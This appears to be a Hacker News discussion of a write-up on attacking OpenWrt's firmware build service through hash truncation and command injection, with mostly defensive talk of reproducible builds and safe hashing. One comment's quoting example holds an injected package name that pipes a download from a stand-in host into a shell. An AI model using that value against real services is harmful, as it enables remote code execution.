Compromising OpenWrt Supply Chain (flatt.tech)
584 points by udev4096 34 days ago | 99 comments



A vulnerability not mentioned in the article is the normalisation of executing code that has been built specifically for one user or one device, with no validation of reproducibility and no way for anyone to verify that this custom build-and-download service hasn't been generating backdoored builds.

One should want to be running the same build of xz-utils that Andres Freund is running, or at least a build of xz-utils that other security researchers can later obtain to figure out whether supply chain implants are present in open source software[1].

There's a write-up at Mozilla[2] from years ago describing an abandoned attempt to ensure their release builds are publicly logged in a Merkle tree. Google has written up their implementation for Pixel firmware builds, but apps delivered through the Google Play Store seem to be vulnerable (unless there is another log I have been unable to find).[3] Apple is seemingly worse than Google on binary transparency, with Apple's firmware and app distribution system targeting builds to individual devices with no transparency of builds.

For an example of binary transparency done well, Gentoo's ebuild repository (a single Git repository, and thus a Merkle tree containing source checksums) is possibly the largest and most widely distributed Merkle tree of open source software.

[1] Post xz-utils backdoor, some researchers (including some posting to oss-security about their efforts) undertook automated/semi-automated scans of open source software builds to check for unexplained high entropy files which could contain hidden malicious code. This is not possible to achieve with customised per-user/per-device builds unless every single build is made publicly available for later analysis and a public log (Merkle tree) accompanies those published builds.

[2] https://wiki.mozilla.org/Security/Binary_Transparency

[3] https://developers.google.com/android/binary_transparency/ov...


This is a nice idea, and one I also advocate for. However, it's important to keep in mind that reproducibility relies on determinism, and much of what goes into a build pipeline is inherently nondeterministic: we make decisions at compile time which can differ from one compilation run to the next, even setting flags aside. In fact, that's the point of an optimizing compiler; as many reproducible-build projects have discovered, turning on optimizations pretty much guarantees no reproducibility.


As long as the compiler is not optimizing by "let's give this 3 seconds of solving time, then continue if no better solution is found", then optimizing is not inherently nondeterministic.


Counterpoint: Arch Linux is 89% reproducible with optimizations enabled. The only thing I see that is difficult to make reproducible is an optimization with a timeout.


Instead of using a timeout, an optimization that must be cut off when its cost becomes excessive can keep some kind of operation or size count, where the count is strictly a function of the input. For example, an optimization based on binary decision diagrams (BDDs) can put a ceiling on the number of nodes in the BDD.
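
A minimal sketch of that idea in Python (all names hypothetical): the pass charges every unit of work against a fixed budget, so where it gives up depends only on the input, never on wall-clock time.

    class BudgetExceeded(Exception):
        pass

    class Budget:
        def __init__(self, max_ops):
            self.max_ops = max_ops  # fixed ceiling, part of the compiler's definition
            self.ops = 0

        def charge(self, n=1):
            self.ops += n
            if self.ops > self.max_ops:
                raise BudgetExceeded

    def optimize(nodes, budget):
        out = []
        try:
            for node in nodes:
                budget.charge()    # count work, not seconds
                out.append(node)   # ... simplification would happen here ...
        except BudgetExceeded:
            return nodes           # identical fallback on every run for this input
        return out

Two runs on the same input always stop at the same point, which a "3 seconds of solving time" cutoff cannot guarantee.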


This is defeatist: compilers do not usually use the system RNG to make decisions, so what's happening is an entirely accidental introduction of differences which then propagate.

There is "intentional input" (contents of the source files), and "accidental input" (source file full paths, timestamps, layout of memory given to you by the OS, and so on). A reproducible build system should give the same output for the same "intentional input".

(the only place where you do see RNG driven optimization is things like FPGA routing, which is a mess of closed toolchains anyway. It has no place in regular software compilers.)


Why does an optimizing compiler introduce nondeterminism?

In my mind an optimizing compiler is a pure function that takes source code and produces an object file.


Well, a lot of things can have an influence here: a multithreaded build, PGO, or even the iteration order of a hash table inside the code optimizer. Things become probabilistic and thus somewhat nondeterministic: the build itself is nondeterministic even though the final executable's behaviour is deterministic.
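
The hash-table point is easy to demonstrate in Python, where str hashing is seeded randomly per interpreter run unless PYTHONHASHSEED is pinned:

    # Run this script twice: the printed order can differ between runs,
    # so any build output derived from hash-based iteration order
    # (e.g. the order symbols are emitted) can differ too.
    symbols = {"init", "main", "helper", "cleanup"}
    print(list(symbols))    # nondeterministic across interpreter runs
    print(sorted(symbols))  # the usual fix: impose a total order before emitting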


"Reproducible" isn't necessary for "not modified from what everyone else gets", and that still makes some attacks FAR harder (and easier to identify, as you know what the "normal" one is). And a published Merkle tree just makes it easier to verify "none of this has changed", as opposed to SHAs on a website that could change any time.


For sure, which is one of the big benefits of git + git tagging. But even if you know you received the same binary as everyone else, without reproducible and auditable builds you have no idea whether that binary originated from the same code, in the case of a targeted attack.


> For sure, which is one of the big benefits of git + git tagging

That's not enough for serious security though, because git is (still) using SHA1 instead of SHA256. You would need something extra, like a signed commit.

There's also the much simpler pitfall of an attacker just creating a branch named the same as a commit, in the hopes that people will accidentally check it out instead.


Then use git in sha2 mode. You just have to turn that on.
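
For reference (assuming a reasonably recent Git; the SHA-256 object format landed behind a flag in 2.29, and interop with SHA-1 repositories is still limited):

    git init --object-format=sha256 myrepo
    cd myrepo
    git rev-parse --show-object-format   # prints: sha256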


For Google Play: https://developer.android.com/guide/app-bundle/code-transpar...

As far as I know there's no centralised log, it's left up to app developers to publish their key/a log of transparency files.


Using a build service like that is a priori saying "I'm not valuable enough for a targeted attack".


> automated/semi-automated scans of open source software builds to check for unexplained high entropy files which could contain hidden malicious code

That's easily defeated though; you just spread out the entropy.


It's easy to defeat right now because very few are currently thinking about secure build systems.

As an example, systemd's latest source tarball has two Web Open Font Format (WOFF) files in a documentation folder, a favicon.png, a few small screenshots, and error messages that have unexplained 128-bit identifiers. There are also translated strings (PO files) which could include obscure writing systems few can quickly audit, and thus could be advantageous to an attacker wanting to hide malicious code.

The problem with most build systems is that the entire source tarball is extracted into a single location, and any build scripts executed during the build have access to everything in the source tarball. Gentoo's portage does apply sandboxing around the entire build process, just not internally between the different build stages.

Continuing the Gentoo example (one of the better examples of sandboxed builds), ideally src_unpack could take a compressed tarball distributed by an upstream project and split its files into multiple separate paths, such as:

- source code files and build scripts needed to build binaries

- supporting test files needed to test the built binaries

- supporting documentation/binary/high-entropy data, such as application icons, game data, documentation, etc., that should be copied upon installation but isn't required to build binaries

Then src_prepare, src_configure, src_compile, src_test and src_install would all have different sandbox configurations restricting which of the file classes separated during src_unpack each build phase can interact with.
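
A toy sketch of such a policy in Python (hypothetical names, not actual portage syntax):

    # Each phase may only read the file classes it genuinely needs;
    # src_unpack is the only phase that sorts files into classes.
    PHASE_ACCESS = {
        "src_prepare":   {"source"},
        "src_configure": {"source"},
        "src_compile":   {"source"},
        "src_test":      {"source", "testdata"},
        "src_install":   {"source", "testdata", "assets"},
    }

    def readable(phase, file_class):
        return file_class in PHASE_ACCESS.get(phase, set())

    # Fonts, icons and other high-entropy assets are invisible while compiling:
    assert not readable("src_compile", "assets")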

For the systemd example above, some possible improvements could be:

1. Remove WOFF font files and use system default fonts, omit favicon.png and omit screenshots. Or only make WOFF font files, favicon.png and screenshots available for copying during the src_install phase, and ensure they are not readable by build scripts during src_configure and src_compile.

2. Generate error message identifiers using an explained approach, such as hash_algorithm("systemd_error_" + name_of_error_constant), to produce nothing-up-my-sleeve identifiers (see the sketch after this list).

3. Only provide access to and include in the build process any translation files of languages the user cares about. Or only make translation files available for copying during the src_install phase and possibly src_test too, and ensure they are not readable by build scripts.
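
A minimal sketch of point 2, assuming SHA-256 truncated to 128 bits would be acceptable for these identifiers (the prefix and constant name are illustrative):

    import hashlib
    import uuid

    def message_id(name: str) -> uuid.UUID:
        # Anyone can recompute this from the constant's name, so the
        # 128-bit value verifiably isn't smuggling arbitrary data.
        digest = hashlib.sha256(b"systemd_error_" + name.encode()).digest()
        return uuid.UUID(bytes=digest[:16])

    print(message_id("SD_MESSAGE_COREDUMP"))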

These build-system security techniques are obviously more work, but are generally straightforward to understand and implement. They are in the realm of possibility for smaller embedded Linux systems that may just be kernel + BusyBox + a few small scripts + a bespoke application + a handful of dynamic libraries. And for more complex Linux systems, these techniques are within the realm of possibility when targeted towards high-value software, such as software requiring (or often executed with) root permissions, and software requiring simultaneous access to the Internet and to user files.


Yeah I remember Google's certificate transparency team basically designing firmware transparency for all of Linux (not just Android) as well.


Isn't the "".join also dangerous?

    get_str_hash(
        "".join(
            [
                build_request.distro,
                build_request.version,
                build_request.version_code,
                build_request.target,
                ...
You can shift characters between adjacent fields without changing the hash. Maybe you cannot compromise the system directly, but you could poison the cache with a broken image, or induce a downgrade.
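
For instance (a toy demonstration; the real function in the article additionally truncates the hash):

    import hashlib

    def get_str_hash(s):
        return hashlib.sha256(s.encode()).hexdigest()

    # distro="openwrt", version="23.05.0" vs distro="openwrt2", version="3.05.0"
    a = "".join(["openwrt", "23.05.0"])
    b = "".join(["openwrt2", "3.05.0"])
    assert a == b                              # both are "openwrt23.05.0"
    assert get_str_hash(a) == get_str_hash(b)  # same cache key, different requests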


Yes, one should use a hmac for hashing multiple inputs, for the reason you explained.

Edit: s/hmac/incremental hashing/


Not quite. HMAC helps prevent length-extension attacks (if the underlying hash was vulnerable in the first place), and the secret key prevents attackers from predicting the hash value (like OP did).

But HMAC doesn't help against ambiguously encoded inputs:

  hmac(key, 'aa'+'bb') == hmac(key, 'aab'+'b')
You want a way to unambiguously join the values. Common solutions are:

- prepending the length of each field (in a fixed number of bytes);

- encoding the input as JSON or other structured format;

- padding fields to fixed lengths;

- hashing fields individually, then hashing their concatenation;

- use TupleHash, designed specifically for this case: https://www.nist.gov/publications/sha-3-derived-functions-cs...
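
A minimal sketch of the first option (length-prefixing) in Python:

    import hashlib
    import struct

    def hash_fields(*fields: bytes) -> str:
        h = hashlib.sha256()
        for f in fields:
            h.update(struct.pack(">Q", len(f)))  # 8-byte big-endian length prefix
            h.update(f)
        return h.hexdigest()

    # Bytes can no longer shift between fields without changing a length prefix:
    assert hash_fields(b"aa", b"bb") != hash_fields(b"aab", b"b")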


Wouldn’t “x”.join(…) be enough?


Possibly not:

  "x".join({'aa'+'bxb'}) == "x".join({'aaxb','b'})
The separator should not be able to show up in the inputs.


This is why I raised an eyebrow when TFA wrote,

> When I saw this, I wondered why it has several inner hashes instead of using the raw string.

The inner hash constrains the alphabet of that portion of the input to the outer hash, thus easily letting you use a separator like "," or "|" without having to deal with the alphabet of the inner input, since it gets run through a hash. That is, for a very simplistic use case of two inputs a & b:

  # assuming sha256() here returns a hex-digest string
  sha256(','.join(
    [sha256(a), sha256(b)]
  ))
If one is familiar with a git tree or commit object, this shouldn't be unfamiliar.

Now … whether that's why there was an inner hash at that point in TFA's code is another question, but I don't think one should dismiss inner hashes altogether.


I could see an attack vector here based on file/directory names or the full path. Different inputs could lead to the same order of enumerated checksums.


I'm not dismissing them; inner hashes returning a hexadecimal string fulfill the "the separator should not be able to show up in the inputs" constraint.


Thanks—that makes sense. I was struggling to come up with an example that would fail but I was just unconsciously assuming the separator wasn’t showing up naturally in the individual parts instead of explicitly considering that as a prerequisite.


Only if you can guarantee that it isn't possible for someone to sneak in an input that already contains those "x" characters.


Yeah, I confused HMACs with incremental hashing; I use both at once.


What do you mean by "incremental hashing"? Note that the Init-Update-Finalize API provided by many cryptography libraries doesn't protect against this - calling Update multiple times is equivalent to hashing a concatenated string.
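
E.g. with Python's hashlib:

    import hashlib

    h1 = hashlib.sha256()
    h1.update(b"aa")
    h1.update(b"bb")

    h2 = hashlib.sha256(b"aabb")
    assert h1.hexdigest() == h2.hexdigest()  # two updates == one concatenated hash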


I mean the same thing you call Init-Update-Finalize.

Link needed about the dysfunctional implementations.


No, these APIs are intentionally designed to be equivalent to hashing all data at once - i.e. to make it possible to hash in O(1) space.

There's nothing "dysfunctional" about that.

"Incremental hash function" has a very different meaning and doesn't seem to have any relevance to what is discussed here: https://people.eecs.berkeley.edu/~daw/papers/inchash-cs06.pd...


I guess the PHP documentation is wrong then. Look at this: https://www.php.net/manual/en/function.hash-init.php


That page includes an example that shows PHP's incremental hashing is what you describe as "dysfunctional". It hashes "The quick brown fox jumped over the lazy dog." in 1 part, and in 2 parts, and shows that the resulting hashes are equal.


I made a mistake.


For anyone curious PHP ultimately uses this definition in their introduction portion of the hash extension:

> This extension provides functions that can be used for direct or incremental processing of arbitrary length messages using a variety of hashing algorithms, including the generation of HMAC values and key derivations including HKDF and PBKDF2.


For example, try running this Go program: https://go.dev/play/p/atvS3j8Dzg-

Or see the Botan documentation that explicitly says "Calling update several times is equivalent to calling it once with all of the arguments concatenated": https://botan.randombit.net/handbook/api_ref/hash.html

I've worked with many cryptography libraries and have never seen an Init-Update-Finalize API that works the way you think it does. It does not protect against canonicalization attacks unless you're using something like TupleHash.


That's why open source can never compete with business grade closed source stuff:

- they fixed the issue in 3 hours instead of making customers wait 6 months for a patch (if any)

- they did not try to sue the reporter of the issue

- they did not even tell the users to throw away the "outdated" but perfectly working devices, offering a small discount to buy new


Maybe make it clear you are being sarcastic here. English is not my native language, and my initial interpretation was that "they" in your post referred to the "business grade closed source stuff" vendors, and that OpenWRT is really a dangerous bet because they are guilty of all the things you listed.


To be fair, that initial confusion is the intended effect of OP's humor. Poe's law and all, but you did figure it out so the joke seems effective. Prefixing or suffixing with sarcasm warnings neuters the joke.


The sarcasm was abundantly clear in the first bullet point.


Did you read the article? OP was very clear that OpenWRT fixed the issue in under 3 hours.


Just why I love OpenWrt. They even ask the people that use screen readers like me to test the web interface to make sure that all is working as it should.


Whilst this is true, it looks like OpenWRT fixed the hash truncation but not the command injection.

I hope they're planning on fixing the command injection. As the blog post says, the created images are signed. Even without the signing, it's code execution from untrusted user input. And of course vulnerabilities can be strung together (just like in this hash collision case).


> Whilst this is true, it looks like OpenWRT fixed the hash truncation but not the command injection.

They did fix both AFAIK, the command injection fix is https://github.com/openwrt/asu/commit/deadda8097d49500260b17... (source: https://openwrt.org/advisory/2024-12-06).


Thanks for the correction and sorry for the mistake. I skimmed the changes but apparently not very well.


I have a router from my ISP that I am forced to use, and it has had a few CVEs ranging from not good to really bad, most of which are years old. I can get a replacement, but it's just the same model. They don't care about security at all and don't care about patching it, even though they have exclusive access rights to the router and can remotely log in to it. It's completely ridiculous.


The one I use looks scary too, and it came with a dumb default password. I wouldn't be surprised if it had a few CVEs hanging around too.

> I have a router that from my ISP I am forced to use...

A friend of mine impersonated the ISP router's MAC address and used Wireshark to sniff the traffic when the modem started. He then configured the ONT (which is physically inside an SFP plug; it's tiny) to establish the handshake and send the credentials.

I don't think the ISP has any idea at all :)


That's so satisfying! I want to try the same, it would make for a good blog post lol


It's a sad state of affairs, but anyone serious about security ought to consider the common ISP WiFi router to be a potentially hostile device and class it as part of the public side of the Internet. The usual advice is to put a firewall/router of your own running your preferred software, between the ISP device and your network.


What forces you to use it? You can’t bring your own router?


Routers supplied by AT&T here in the US for their fiber gigabit service do RADIUS authentication with the carrier gateway using certs built into the device. There used to be an older version of this router that had known vulnerabilities which made extracting those certs possible but they've since been patched and those certs have been invalidated.


Note that you can still downgrade an existing gateway, extract certs[0], then bypass the device [1]. I had to do this with OPNsense to avoid the latency buildup issue, which has been ongoing for months[2].

---

0 -- https://www.dupuis.xyz/bgw210-700-root-and-certs/

1 -- https://github.com/MonkWho/pfatt

2 -- https://www.reddit.com/r/ATTFiber/comments/1eqfouo/psa_att_n...


I believe you can set those to pass-through mode and put a router/firewall behind it without any kind of double NAT. Other than some kind of MITM, you have at least minimized the likelihood of someone using it as an entry point to your network.


This only works for a handful of open source projects with corporate backing and the resources to fix these issues quickly.

For most OSS projects, the maintainers are either too overworked or just don't feel like fixing security issues.


> For most OSS projects, the maintainers are either too overworked or just don't feel like fixing security issues.

Surely you can't be serious about "most" (= a clear majority) oss projects not fixing vulnerabilities in a reasonable time frame?


Not gonna lie, you had me in the beginning.


> they did not even tell the users to throw away the "outdated" but perfectly working devices, offering a small discount to buy new

Because they simply brick the device when updating, and it's easier, faster and cheaper to buy a new device than to unbrick it.


Home Assistant and VLC, anyone?


HA was very user-unfriendly when I last tried it ~3 years ago.

YAML was necessary, and it required a lot of fiddling to make Z-Wave work. Each blind was detected as ~5 entities (2 of them useless, or no idea what for)... Checking which was position, which was power, etc. was rather annoying.

I made it work, and something broke about a year later. I just replaced it with off-the-shelf stuff.


HASS configuration has gotten a lot better in the past few years. Almost everything can now be done via the UI, including automation and scripting, and it's one of the smoothest scripting GUIs I've used. It even supports cut/paste for visual blocks. And for those 5% cases, there's an inline YAML editor which will open (and validate) only the pertinent block of what I'm sure is a 1000-line YAML file for editing in-browser.

Z-Wave is still dodgy, but the migration to zwavejs has been an improvement and probably is as good as things will get with the state of Z-Wave being what it is.

It's still not perfect, but HASS has become one of my user-facing open-source success stories. Most of the remaining annoyances are out of their control at this point.


First: an open source tool was adapted, in a short time, to a task it wasn't made for, only because it is open source and written without BuilderFactoryProvider (already mentioned, so I'm sorry, but it's killing me every day). A big company would probably take -1 years to fix this, because it would just sue the guy, try to arrest him ASAP, and never release a patch. OpenWrt, after getting the report, immediately took the insecure service offline, verified the report (while clients were already safe because of the shutdown), then made a patch and released it, all within 3 hours. Wow!


Loving this. I wonder how people even come up with the idea of truncating hashes. For what purpose or benefit?


Truncated hash functions are not vulnerable to length-extension attacks. But you usually take SHA-512 and truncate it to 256 bits; anything shorter than that isn't really considered safe these days.
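
E.g., in Python (plain truncation shown for illustration; the standardized SHA-512/256 also uses different initial values, it is not just a truncation):

    import hashlib

    digest = hashlib.sha512(b"message").digest()[:32]  # 256-bit truncation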


Sometimes it’s done to fit into an existing tool/database that has a preexisting limit. Or when the hash is used only as a locator rather than for integrity.

Not a good practice imo but people are pragmatic.


According to the commit, they did it to reduce the length of the downloaded filename and URL.


For when you need a smaller payload:

> According to @Reid's answer in [2] and @ThomasPornin's answer in [3], the idea of truncating hashes is fully supported by NIST; in fact SHA-224 is just SHA-256 truncated, SHA-384 is just SHA-512 truncated, etc.
https://security.stackexchange.com/a/97389


When you upgrade from SHA-1 to SHA-256 but you don't want to change your data format for storing the integrity checks/keys.


A SHA-1 hash is not 12 characters, though (neither in digest bytes nor in hex nibbles).


First of all, nice writeup. I am a bit surprised that so much GPU power was needed to find such a short collision, but it was nice to see his implementation nevertheless.

Regarding the last section: is 40k a reasonable price for one month of security analysis? Does this mean that a good security researcher makes about 500k/yr?


It means a good security research company might make $500k for a good researcher, if they could bring in enough work to keep them 100% utilised. Less actually, given paid time off.


Sick leave, maternity leave, underutilization for sure (toilet, meetings, etc.).

Just for reference, I had an audit from PwC and they were skeptical about our 65% time utilization, because usually anything above 60% is at least partly fake. LOL, I thought; they were right, we ended up at just about 60%.


Which, if past experience still holds, translates to something more like ~$165k/yr + benefits.


That seems very reasonable to me. It seems like the pentest companies I have worked with in the past charge that much and just do a lazy nmap/metasploit scan and wrap it into a nice PDF.


> so much GPU power was needed

In the post-LLM age, one hour of compute on a 4090 is closer to "so little" than "so much". You can have that for less than $1.


2^(12*4) is 281,474,976,710,656 possible 12-character strings, so it's seriously impressive that it can look through that many in an hour.


A bit over 4 hours at 18 billion per second, but yeah. Impressively fast, and also a completely reasonable amount of time for an attempt: the CPU version was 10M per second, which would be most of a year to search the whole space.
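
The back-of-the-envelope numbers check out (quick Python):

    space = 16 ** 12             # 12 hex characters = 2**48 ≈ 2.81e14
    print(space / 18e9 / 3600)   # ≈ 4.3 hours at 18 GH/s (GPU)
    print(space / 10e6 / 86400)  # ≈ 326 days at 10 MH/s (CPU)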


>I immediately noticed that the length of the hash is truncated to 12, out of 64 characters.

Ouch...


Killer write up, very clever bit of code reading and exploit development.


What's this about hashcat performance being orders of magnitude different depending on arg order? Is it scanning the argument line for the target pattern with every execution?


Could it be like a lock-picking process where you start from the left and see if you get further or can throw away that guess, so by having the "choices" be at the beginning you don't have to make them again and again (and for whatever reason it doesn't/can't cache the prefix)? Or could it be like counting

     100000000000
     010000000000
     110000000000
     001000000000
most of the variation is at the left and you only rarely see changes at the right? Would be interesting to get this answer from someone who knows hashcat and isn't just pulling answers out of the air like me :)


Hashing is specifically done to prevent just this. (Just reacting to the comment here; I haven't grokked the specifics.)


That just makes it even more confusing that it takes longer to vary the right than the left. Is the specific hash algorithm used not "balanced" (or whatever the term of art is) the way it ideally/theoretically should be?


Very well written and easy to follow description of your attack.


The title uses the term "supply chain" but it appears nowhere in the blog post. I keep seeing this term used by "cybersecurity" researchers and software developers in ways that seem to differ from the definition I learned in school.

From Wikipedia:

"A supply chain is a complex logistics system that consists of facilities that convert raw materials into finished products and distribute them^[1] to end consumers^[2] or end customers.^[3]"

    1. Ganeshan, R. and Harrison, T. P., An Introduction to Supply Chain Management, updated 22 May 2005, accessed 29 June 2023

    2. Ghiani, Gianpaolo; Laporte, Gilbert; Musmanno, Roberto (2004). Introduction to Logistics Systems Planning and Control. John Wiley & Sons. pp. 3-4. ISBN 9780470849170. Retrieved 8 January 2023.

    3. Harrison, A. and Godsell, J. (2003), Responsive Supply Chains: An Exploratory Study of Performance Management, Cranfield School of Management, accessed 12 May 2021
Was https://sysupgrade.openwrt.org set up for commercial suppliers of OpenWRT? How about https://firmware-selector.openwrt.org ?

I always assumed commercial suppliers compiled from source to add their own modifications, and then created their own images.

As a consumer of OpenWRT, I compile from source or use "official" images.


Device updates can be supplied by an update service. The device (and its user as the end consumer) is not attacked directly but through its update supply chain; this is why it's called a supply chain attack.

When somebody intercepts your Christmas presents to add a bomb to your new pager, that is also a supply chain attack, even if you use the pager for work and the bomb targets your business partner. If somebody throws the bomb directly at the target, it is not a supply chain attack.

Supply chains are often less secured than direct attack vectors.


Nicely done. Good write up too. I liked the bits about making hashcat do what you wanted.


Hi, I'm the one who created this service within a "Google Summer of Code" some 7 years ago and I've been maintaining it since. It was my first "larger" project, and while it started as a short Python project, I eventually became an OpenWrt project member since the build system itself required so many changes.

I'd be very happy for further audits and reviews of the code; after multiple years of low interest, it now produces and caches about 1000 individual firmware images a day. I think it's only a question of time until other issues come up...


OpenWrt is also very difficult to safely upgrade on some devices, which I would also consider a huge downside. I finally gave up, bought an old Dell off eBay, installed OPNsense, and am much happier.



Sure does, but I don't evaluate firewalls based on the quality of their marketing materials.


Some devices are hard to upgrade in large part because they were never intended to be used with things like OpenWRT.

To that end: While it can be nice that OpenWRT runs on a quirky compact all-in-one MIPS-based consumer router-box (or whatever), the software also runs just fine on used Dells from eBay.


That was an excellent report and a really decent technical explanation. Good to see how quickly OpenWrt (one of my favorite open-source projects) fixed and addressed this vulnerability!


Kudos to the researcher for finding this, and to the openwrt team for the impressive response.

I know that OPNsense is preferred over pfSense when it comes to performance, but does OpenWrt compete at speeds at or above 10 gig?


Is there any way to fix the command injection solely in the Makefile?


If Bash is used as the SHELL for make[0], then it might be possible with the ${parameter@Q} parameter expansion[1].

I would still rather resort to Python's shlex.quote[2] on the Python side of things, tbh (see the sketch after the links below).

[0]: https://stackoverflow.com/questions/589276/how-can-i-use-bas...

[1]: https://www.gnu.org/savannah-checkouts/gnu/bash/manual/bash.... (at the end of the chapter)

[2]: https://docs.python.org/3/library/shlex.html#shlex.quote
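
For the Python-side approach, a minimal sketch (the function and make invocation are hypothetical, not the actual ASU code):

    import shlex

    def make_build_command(packages):
        # Quote each untrusted value before it ever reaches a shell/make line.
        quoted = " ".join(shlex.quote(p) for p in packages)
        return f"make image PACKAGES={quoted}"

    print(make_build_command(["vim", "tcpdump; curl evil.sh|sh"]))
    # make image PACKAGES=vim 'tcpdump; curl evil.sh|sh'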


I'm getting an error when I try to view this:

Secure Connection Failed

An error occurred during a connection to flatt.tech. SSL received a record that exceeded the maximum permissible length.

Error code: SSL_ERROR_RX_RECORD_TOO_LONG

No-one else?


Works for me, no errors, using Firefox. But a quick peek at their certificate details shows several dozen Subject Alternative Names.

That's probably a corner case which your browser's devs failed to test.


No error even through my company's crappy proxy (which doesn't support QUIC and sometimes has problems with HTTP/2). It works and loads rather quickly.


Very cool article, security researchers are incredibly creative and scary smart.



